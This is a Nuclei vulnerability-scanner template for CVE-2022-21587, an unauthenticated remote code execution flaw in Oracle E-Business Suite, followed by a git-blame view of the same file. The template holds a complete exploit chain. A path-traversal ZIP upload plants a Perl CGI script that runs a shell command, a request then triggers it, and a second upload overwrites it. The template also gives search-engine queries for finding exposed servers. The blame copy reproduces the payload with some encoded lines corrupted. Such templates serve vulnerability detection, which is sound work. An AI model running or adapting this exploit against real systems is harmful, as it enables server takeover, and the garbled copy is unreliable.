nuclei-templates/http/cves/2022/CVE-2022-21587.yaml

id: CVE-2022-21587

info:
  name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution
  author: rootxharsh,iamnoooob,pdresearch
  severity: critical
  description: |
    Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  remediation: |
    Apply the necessary security patches provided by Oracle to mitigate this vulnerability.
  reference:
    - https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
    - https://www.oracle.com/security-alerts/cpuoct2022.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-21587
    - http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html
    - https://github.com/manas3c/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-21587
    cwe-id: CWE-306
    epss-score: 0.97364
    epss-percentile: 0.99901
    cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: oracle
    product: e-business_suite
    shodan-query: http.title:"login" "x-oracle-dms-ecid" 200
    fofa-query: title="login" "x-oracle-dms-ecid" 200
    google-query: intitle:"login" "x-oracle-dms-ecid" 200
  tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm

http:
  - raw:
      - |
        POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv

        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
        Content-Disposition: form-data; name="bne:uueupload"

        TRUE
        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
        Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"

        begin 664 test.zip
        M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
        M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
        M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
        M=&5X="]P;&%I;B<@*3L*;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
        M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD*3L*97AI="`P.PH*4$L!`A0#
        M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
        M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R
        G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
        `
        end
        ------WebKitFormBoundaryZsMro0UsAQYLDZGv--
      - |
        GET /OA_CGI/FNDWRR.exe HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv

        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
        Content-Disposition: form-data; name="bne:uueupload"

        TRUE
        ------WebKitFormBoundaryZsMro0UsAQYLDZGv
        Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"

        begin 664 test.zip
        M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
        M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
        M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
        M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
        M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
        (``!B````````
        `
        end

    matchers:
      - type: word
        part: body_2
        words:
          - Nuclei-CVE-2022-21587
# digest: 4a0a00473045022032af4a350303b8c92a65b5b1cddca213edfb19eda931fd1c3414c457fe867137022100e99db72d927e85cc186ba25a3ae61c37bffb9e2804aaede9af586929b803458b:922c64590222798bb761d5b6d8e72950
Create CVE-2022-21587.yaml 2023-01-20 14:15:46 +00:00			`id: CVE-2022-21587`

			`info:`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`name: Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution`
Added CVE-2023-0669 - GoAnywhere MFT - Remote Code Execution (ZeroDay) (#6701) * Create CVE-2023-0669.yaml Co-Authored-By: Dhiyaneshwaran <24750220+DhiyaneshGeek@users.noreply.github.com> Co-Authored-By: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com> * misc update --------- Co-authored-by: Dhiyaneshwaran <24750220+DhiyaneshGeek@users.noreply.github.com> Co-authored-by: Harsh Jaiswal <21000421+rootxharsh@users.noreply.github.com> 2023-02-10 14:50:32 +00:00			`author: rootxharsh,iamnoooob,pdresearch`
Create CVE-2022-21587.yaml 2023-01-20 14:15:46 +00:00			`severity: critical`
Update CVE-2022-21587.yaml 2023-01-20 16:11:38 +00:00			`description: \|`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`Oracle E-Business Suite 12.2.3 through 12.2.11 is susceptible to remote code execution via the Oracle Web Applications Desktop Integrator product, Upload component. An attacker with HTTP network access can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Apply the necessary security patches provided by Oracle to mitigate this vulnerability.`
Create CVE-2022-21587.yaml 2023-01-20 14:15:46 +00:00			`reference:`
			`- https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/`
			`- https://www.oracle.com/security-alerts/cpuoct2022.html`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-21587`
Added CPE and EPSS Score to CVE Templates 2023-04-12 10:55:48 +00:00			`- http://packetstormsecurity.com/files/171208/Oracle-E-Business-Suite-EBS-Unauthenticated-Arbitrary-File-Upload.html`
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot: 2024-03-23 09:28:19 +00:00			`- https://github.com/manas3c/CVE-POC`
Auto Generated CVE annotations [Fri Jan 20 16:31:57 UTC 2023] :robot: 2023-01-20 16:31:57 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
			`cve-id: CVE-2022-21587`
Added EPSS Percentile 2023-08-31 11:46:18 +00:00			`cwe-id: CWE-306`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.97364`
			`epss-percentile: 0.99901`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:oracle:e-business_suite::::::::`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 3`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: oracle`
			`product: e-business_suite`
product/queries updated 2024-05-31 19:23:20 +00:00			`shodan-query: http.title:"login" "x-oracle-dms-ecid" 200`
			`fofa-query: title="login" "x-oracle-dms-ecid" 200`
			`google-query: intitle:"login" "x-oracle-dms-ecid" 200`
auto tagging via templateman 2024-01-14 09:21:50 +00:00			`tags: cve,cve2022,intrusive,ebs,unauth,kev,rce,oast,oracle,packetstorm`
Create CVE-2022-21587.yaml 2023-01-20 14:15:46 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2022-21587.yaml 2023-01-20 14:15:46 +00:00			`- raw:`
			`- \|`
			`POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv`

			`------WebKitFormBoundaryZsMro0UsAQYLDZGv`
			`Content-Disposition: form-data; name="bne:uueupload"`

			`TRUE`
			`------WebKitFormBoundaryZsMro0UsAQYLDZGv`
			`Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"`

			`begin 664 test.zip`
			M4$L#!!0``````"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO
			M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
			M1%=24BYP;'5S92!#1TD["G!R:6YT($-'23HZ:&5A9&5R*"`M='EP92`]/B`G
			M=&5X="]P;&%I;B<@3L;7D@)&-M9"`](")E8VAO($YU8VQE:2U#5D4M,C`R
			M,BTR,34X-R(["G!R:6YT('-Y<W1E;2@D8VUD3L97AI="`P.PH*4$L!`A0#
			M%```````+W`T5NC)6R=Z````>@```$,``````````````+2!`````"XN+RXN
			`M+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO<V-R`
			G:7!T<R]T>&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````
			`
			`end`
			`------WebKitFormBoundaryZsMro0UsAQYLDZGv--`
			`- \|`
			`GET /OA_CGI/FNDWRR.exe HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv`

			`------WebKitFormBoundaryZsMro0UsAQYLDZGv`
			`Content-Disposition: form-data; name="bne:uueupload"`

			`TRUE`
			`------WebKitFormBoundaryZsMro0UsAQYLDZGv`
			`Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip"`

			`begin 664 test.zip`
			M4$L#!!0``````&UP-%:3!M<R`0````$```!#````+BXO+BXO+BXO+BXO+BXO
			M1DU77TAO;64O3W)A8VQE7T5"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.
			M1%=24BYP;`I02P$"%`,4``````!M<#16DP;7,@$````!````0P``````````
			M````M($`````+BXO+BXO+BXO+BXO+BXO1DU77TAO;64O3W)A8VQE7T5"4RUA
			M<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.1%=24BYP;%!+!08``````0`!`'$`
			(``!B````````
			`
			`end`

			`matchers:`
			`- type: word`
			`part: body_2`
			`words:`
			`- Nuclei-CVE-2022-21587`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a00473045022032af4a350303b8c92a65b5b1cddca213edfb19eda931fd1c3414c457fe867137022100e99db72d927e85cc186ba25a3ae61c37bffb9e2804aaede9af586929b803458b:922c64590222798bb761d5b6d8e72950`